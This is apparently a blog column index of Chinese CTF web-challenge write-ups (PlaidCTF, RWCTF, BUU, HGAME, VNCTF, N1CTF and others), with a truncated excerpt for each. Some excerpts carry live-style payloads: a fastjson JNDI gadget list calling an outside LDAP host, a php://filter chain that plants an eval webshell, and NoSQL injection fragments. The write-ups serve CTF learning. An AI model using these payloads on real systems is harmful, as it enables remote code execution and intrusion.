
CTF复现
文章平均质量分 84
Dem0@
一些小的学习过程全都放在gitee了:https://gitee.com/Cralwer/study-note
展开
-
从nodectf学chromium和js特性
PlaidCTF-Yet Another Calculator App这周末打了一场NodeCTF(plaidctf),去体验了一下外国友人的快乐比赛,其中就对里面最简单的一道题目进行分析,当然我是爆0党,无语(队友们tql0x01 题目因为题目本身是给了docker的,所以我们应该从题目本身去出发查看这道题目。首先看index.tsapp.post("/upload", async (req, res) => { if (typeof req.body !== "ob原创 2022-04-18 09:39:36 · 634 阅读 · 1 评论 -
从rw中学习tomcat
从RWCTF中学习tomcat的操作0x01 调试tomcat首先创建一个maven的java项目,然后下载tomcat的源码,然后copy以下文件参考链接:https://zhuanlan.zhihu.com/p/35454131y4tacker的github差多就这些,就可以启动一个tomcat的调试了。0x02 解决题目参考链接:https://mp.weixin.qq.com/s/QQ2xR32Fxj_nnMsFCucbCg其中最重要的部分就像wp中写得一样,就是在于几个特殊字符原创 2022-01-28 00:31:58 · 1038 阅读 · 0 评论 -
buu-day10
0x01 [红明谷CTF 2021]JavaWeb/;/json绕过权限校验,然后漏洞探测["java.net.InetAddress","khl16k.dnslog.cn"]["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}]["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"原创 2022-01-27 15:11:07 · 2291 阅读 · 0 评论 -
buu-day09
Day9-懒狗来打卡了0x01 [WMCTF2020]Web Check in 2.0绕过死亡exit,这是基本操作了,但是需要找到新的过滤器。懒狗想到这里就去看wp了。=php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=6.php还有一种方法是segment,就是那个qwb2021才考过的知识点。需要爆破,就不多说了0x02 [CISCN2019原创 2022-01-26 23:21:45 · 595 阅读 · 0 评论 -
buu-day08
又是早起刷题的一天0x01 [FBCTF2019]Products Managersql约束注入在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断mysql字符串比较mysql == `mysql空格空格空格空格空格空格空格空格空格空格可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。插入name: facebook .原创 2022-01-05 11:05:31 · 668 阅读 · 0 评论 -
buu-day07
新的一天从早起刷题开始文章目录0x01 [NPUCTF2020]web????0x02[HCTF 2018]Hideandsee0x03 [MRCTF2020]Ezpop_Reveng0x04 [GKCTF 2021]babycat0x01 XMLDecoder/XMLEncoder概述0x02 xml简介0x03 xml反序列化源码分析0x01 [NPUCTF2020]web????include('config.php'); # $key,$flagdefine("METHOD", "ae原创 2022-01-05 00:18:23 · 509 阅读 · 0 评论 -
buu-day06
前言: 今天是废物的一天,元旦三天还是要玩一下,不要卷了。0x01 [BSidesCF 2019]Mixer密码web 好题,希望后面可以来复现一波import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)url = "https://mixer-f原创 2022-01-03 22:02:46 · 772 阅读 · 0 评论 -
buu-day05
0x01 [NPUCTF2020]验证????str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '')第一步是一个弱类型比较,下面有两个常用的比较方式a[]=a&b[]=aa='1' &b=[1]注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。第二步就是研究上面这个正则表达式了。一共分为3个原创 2022-01-03 08:08:08 · 784 阅读 · 0 评论 -
buu-day04
0x01[HarekazeCTF2019]Easy Notes这个题目给了源码,用户又没有后端校验,所以我们很容易想到考session的反序列化,因为(sctf考烂了)。具体分析流程可以看网上的·wp,总结就是,需要伪造以下两点:文件名序列化的数据0x02 [SWPU2019]Web3访问任意路由发现的token:keyqqqwwweee!@#$%^&*,发现是伪造session。下面就是随便操作了。.eJyrVspMUbKqVlJIUrJS8g1xLFeq1VHKLI7PyU_Pz原创 2022-01-02 08:24:12 · 534 阅读 · 0 评论 -
MTCTF2021-GrandTravel
GrandTravel0x01 知识点nosql注入+ssrf+node反序列化+node拆分攻击+ftp提权0x02 解题1 sql注入拿到密码首先拿到源码不难看出登录位置有注入嫌疑(感谢葫芦卜师傅的payload)参考https://blog.szfszf.top/article/9/ burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&am原创 2021-12-24 22:13:49 · 962 阅读 · 0 评论 -
[CTF复现]湖湘杯2021
go_web今天又是学爆guoke哥哥博客的一天0x01 MultistageAgency通过看源码 我们发现 这个题是三个服务su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &"su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &"/code/bin/server 2>&1 >/code/log原创 2021-12-14 00:51:51 · 3908 阅读 · 3 评论 -
[CTF复现]hition2021复现
orange师傅yyds!0x01 Wa3rmup PHPyaml_parse 这个函数在官方文档中有提到It seams the YAML standard version here is the 1.1 and not the (1.2 released in 2009), so all of the following values: y, Y, yes, Yes, YES, n, N, no, No, NO, true, True, TRUE, false, False, FALSE, on,原创 2021-12-13 21:32:19 · 1417 阅读 · 0 评论 -
[BUU刷题记录]day01-起步
BUU-WEB这是一个菜鸡的蜕变先小记录一下题目环境部署必备的docker安装sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-releasecurl -fsSL https://download.docker.com/linux原创 2021-12-13 14:46:16 · 5178 阅读 · 0 评论 -
[CTF复现]N1CTF2021-queryallthings
N1CTF2021-queryallthethings0x01 osquery 突破开局一张图,答案全靠猜看到sql注入冲压!.一顿fuzz发现是pgsql!!! 虫虫 堆叠注入查一下用户 查一下权限, yi? 怎么什么都没有???这里可以通过一个特性来确定https://www.sqlite.org/schematab.htmlhttp://47.57.246.66:12321/?str=world'; select * from sqlite_temp_master;--+可以理解原创 2021-11-24 00:31:45 · 867 阅读 · 2 评论 -
[node审计]nodevm2
nodevm的运行流程vm2其实是在vm的基础上进行二次开发所形成的一个沙箱运行环境,所以在内部本身的实现还是调用的是vm的机制。要了解这部分知识必须先了解proxy:https://es6.ruanyifeng.com/?search=weakmap&x=0&y=0#docs/proxy0x01 vm api对应的别人的代码就是const vm = require('vm');const context = { animal: 'cat', count: 2};//转载 2021-09-23 23:41:50 · 1680 阅读 · 0 评论 -
CISCN2021_0解题目(filter)
CISCN2021_0解题目(filter)0x01 题目初现题目复现简单,压缩包解压这里可以关闭debugweb\index.php首先点开zip文件,这个不用多说然后还有hint再联想一下还和log文件有关,那个必定是larval rce那个漏洞相关了。那就不多说了,有兴趣的可以去看看VNCTF2021 中的lar题目:https://blog.youkuaiyun.com/anwen12/article/details/115127075(这个挺详细原cve分析:https://xz.a原创 2021-05-21 16:51:30 · 807 阅读 · 11 评论 -
Nepnep 2021
Nepnep 2021小评价:题目原题比较多,payload好多通杀。不算上非预期的话,题目质量挺好的。0x01 Easy_Tomcat注册源码读取,头像老梗了。tomcat的常用目录static/img/../../WEB-INF/web.xml<?xml version="1.0" encoding="UTF-8"?><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http:原创 2021-03-27 10:18:03 · 457 阅读 · 0 评论 -
VNCTF(web)小白详解
VNCTF(web)小白详解看了下师傅们的wp,发现还挺难理解的。下面跟着大家做个简单的解答。0x01 realezjvav一上来就是常规的登录框,估摸着就是sql注入,paylod一拿到,一打,欸,不错,笛卡尔乘积盲注(原理:多个数据表链接的时候,数据大了,所以时间长)拿到密码no_0ne_kn0w_th1s然后是这个,看不出来,我们继续。发现这个就是我们fastjson,rce了。https://github.com/welk1n/JNDI-Injection-Exploit/blob/原创 2021-03-23 16:06:42 · 1325 阅读 · 2 评论 -
HGAME2021 - 梦的开始
HGAME2021 - 梦的开始WEB0x01 200OK!参考链接:https://blog.youkuaiyun.com/anwen12/article/details/1137280650x02 LazyDogR4U一个简单的代码审计类的问题这是提示这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。0x03 LIKI的生日礼物题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞原创 2021-03-01 20:16:05 · 2339 阅读 · 0 评论 -
FBCTF2019-RCEService
0x01 题目初现<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui原创 2021-02-26 17:38:47 · 281 阅读 · 0 评论 -
HGAME-http欺骗
https欺骗0x01 原理分析http走私是一个很神奇的攻击方式,他根本产生的原因是因为不同服务器对于RFC协议的执行情况不同。这里面最常见的一个例子就是CDN加速。用户通过链接距离其最近的反向代理服务器,当用户请求的静态资源在CDN服务器上有备份的时候,那么就不需要再继续进行下去了,就可以直接获取到想要的数据。当我们向代理服务器发送一个比较模糊的HTTP请求的时候,由于两者的实现方式不同,那我们就可以浑水摸鱼,让代理服务器将我们的请求完整地转发到后端服务器,但后端服务器通过CL和TE头的检测来判原创 2021-02-06 17:12:55 · 1512 阅读 · 0 评论 -
RWCTF2020 DBaaSadge 复现
数据库题目2020RWCTF DBaaSadge WP这是一个很有意思的题目,难到让我绝望,跟着大佬smity的思路跑一下,求大佬抱抱。https://mp.weixin.qq.com/s/jvA5j9OPMFIPvP5267gk-Q0x01 题目一打开就是题目的代码直接执行,可以直接执行pg的代码,但是长度不能超过100.(本身是给了dockerfile)先进行必要的信息收集。select version();select user;然后大佬说这不是10.5之前修复的那个CVE漏洞原创 2021-02-06 08:04:46 · 499 阅读 · 0 评论